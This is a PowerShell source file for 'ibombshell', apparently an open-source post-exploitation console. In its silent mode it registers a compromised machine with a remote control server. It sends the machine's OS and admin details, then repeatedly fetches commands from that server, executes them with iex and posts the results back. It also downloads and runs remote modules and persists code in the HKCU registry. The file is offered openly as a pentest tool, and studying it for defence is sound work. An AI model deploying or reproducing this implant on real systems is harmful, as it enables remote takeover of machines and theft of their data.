function console{ param( [Switch] $Silently, [String] $uriConsole, [String] $id, [String] $proxy ) if ($proxy){ if(-not $proxy.startswith("http")){ $proxy = "http://"+$proxy } } if ($PSVersionTable.PSVersion.Major -lt 3) { return "Upgrade your powershell to version 3 or higher" } function loader{ param( [Parameter(Mandatory)] [string] $command, [Parameter(Mandatory)] [string] $RawBase, [Parameter(Mandatory)] [string] $RawFunctions ) $RawURL = $RawBase + $RawFunctions + $command return make_request -URL $RawURL } function make_request{ param( [string] $method="GET", [Parameter(Mandatory)] [string] $URL, [string] $data ) $wc = new-object system.net.WebClient if ($proxy){ $prx = new-object System.Net.WebProxy $prx.Address = $proxy $wc.proxy = $prx } if ($method -eq "POST"){ $wc.UploadString($url, "POST", $data) } else{ $webpage = $wc.DownloadData($url) $data = [System.Text.Encoding]::ASCII.GetString($webpage) return $data } } # READFUNCTIONS BEGIN function readFunctions{ $path = 'HKCU:\Software\Classes\ibombshell' $path_internals = 'hkcu:\software\classes\ibombshell\internals' # Internal $null = (runRead -path $path_internals -isCommand $false) # No Internal $code = (runRead -path $path -isCommand $true) return $code } function runRead{ param( [Parameter(Mandatory)] [String] $path, [Parameter(Mandatory)] [Boolean] $isCommand ) if(test-path $path) { $listFunctions = (Get-ChildItem $path).Name $code = "" cd hkcu: foreach($i in $listFunctions) { $name = $i.split("\")[-1] if (($name -ne "internals") -and ($name -ne "console")){ $aux = ((Get-Item -Path "$i" | Select-Object -ExpandProperty Property) | ForEach-Object { New-Object psobject -Property @{"property"=$_; "Value" = (Get-ItemProperty -Path "$i" -Name $_).$_}}).Value if (-not $isCommand) { $aux | out-string | iex } else { $code += ($aux | out-string) + "`r`n" addCommand -command $name > $null } } } c: return $code } } # READFUNCTIONS END $banner = " ,--.!, _ ____ __ _____ __ ____ __/ -*- (_) __ )____ ____ ___ / /_ / ___// /_ ___ / / / ,d08b. '|`` / / __ / __ \/ __ ``__ \/ __ \\__ \/ __ \/ _ \/ / / 0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / / __/ / / ``9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/" #Important: URL download ibombshell $gtRawBase = "https://raw.githubusercontent.com/Telefonica/ibombshell/master/" $gtRawFunctions = "data/functions/" $functionsList = "https://raw.githubusercontent.com/Telefonica/ibombshell/master/functions.txt" [System.Collections.ArrayList]$global:functionsLoaded = "showcommands" , "showfunctions" , "quit" [System.Collections.ArrayList]$global:internalFunctions = "detect-OS", "printprompt" , "printMessage", "printData", "isadmin", "commandsearch", "addcommand" #Condition for exit $global:condition = $true if($Silently) { #To Review $ErrorActionPreference = "SilentlyContinue" loader -command "generateid" -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex loader -command "isadmin" -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex if(-not($id)) { $id = generateid } ## Getting system info if (isadmin){ $admin = "admin" }else { $admin = "no" } $info = Get-CimInstance -ClassName Win32_OperatingSystem $os_version = ($info.caption | Out-String).TrimEnd("`r`n") $os_arch = ($info.OSArchitecture | Out-String).TrimEnd("`r`n") #i am new warrior if($uriConsole.Length -ne 0) { # Waiting for a successful connection while ($true) { try { $info = @" results={"os_version":"$os_version", "os_arch":"$os_arch", "admin":"$admin"} "@ $req = make_request -method "POST" -URL "$uriConsole/newibombshell/$id" -data $info break } catch { sleep 5 } } } } else{ $path = 'hkcu:\software\classes\ibombshell' if((Test-Path $path)){ readfunctions | iex > $null }else{ #loader functions default try{ $toLoad = "system/detect-OS", "showfunctions", "showcommands", "addcommand", "commandsearch", "quit", "saveandloadfunctions", "version", "isadmin", "print/printprompt", "print/messagedata" foreach($function in $toLoad){ loader -command $function -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex } addcommand -command "savefunctions" > $null addcommand -command "deletefunctionsreg" > $null addcommand -command "version" > $null }catch { write-host "Check Internet Connection" sleep 1 } } try{ #getting function's list $list = make_request -URL $functionsList }catch{ $list = "" } $detected_os = detect-OS -basic if($detected_os -eq "windows") { $delimet = "`n" $delimet2 = "`r`n" } else { $delimet = "`n" $delimet2 = "`n" } $global:commandList = $list.split($delimet) $localcommandlist = $list.split($delimet2) clear-host write-host -ForegroundColor Yellow $banner write-host write-host -ForegroundColor Red "Use showcommands to see what can be loaded or showfunctions to see what can be run" write-host } $try_connection = 0 while($global:condition) { if($Silently) { if($uriConsole.Length -ne 0) { try { $content = make_request -URL "$uriConsole/ibombshell/$id" } catch { $content = "" $try_connection += 1 if ($try_connection -eq 5) { # If the connection fails 5 attempts the console closes break } } if($content.length -gt 0) { $results = $content | iex if (-not $results) {$results = "Executed. No results have been returned from the command"} #Send results if ($results.GetType().Name -ne "String") { $send = "" foreach($i in $results) { $send = $send + $i + '\n' } $results = $send } $results = @" results=$results "@ $r = make_request -method "POST" -URL "$uriConsole/ibombshell/$id" -data $results } } sleep 5 } else { printprompt $command = Read-Host $command = $command.TrimStart() if(($command.Length -eq 0)) { continue } if ($command -eq "cls" -or $command -eq "clear") { cls | iex continue } if ($command.startswith("#")){ $c = $command.split("#") if ($c.Length -gt 1){ $c = $c[1].Trim() if ($c){ $c | iex } } } elseif ((commandsearch -command $command.split(" ")[0] -list $functionsLoaded) -and ($command.Split(" ")[0].Equals("loaderext"))) { $command | iex | iex } elseif (commandsearch -command $command.split(" ")[0] -list $functionsLoaded) { $command | iex } elseif (commandsearch -command $command -list $localcommandlist) { try { $result = addcommand -command $command if ($result -ne -1) { loader -command $command -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex printMessage -message "Function Loaded" }else{ printMessage -message "That function is already loaded" } } catch { printMessage -message "Something went wrong loading the module" printMessage -message "$_.Exception.Message" $global:functionsLoaded.removeat($result) } } else { printMessage -message "Stupid Command!" } } } }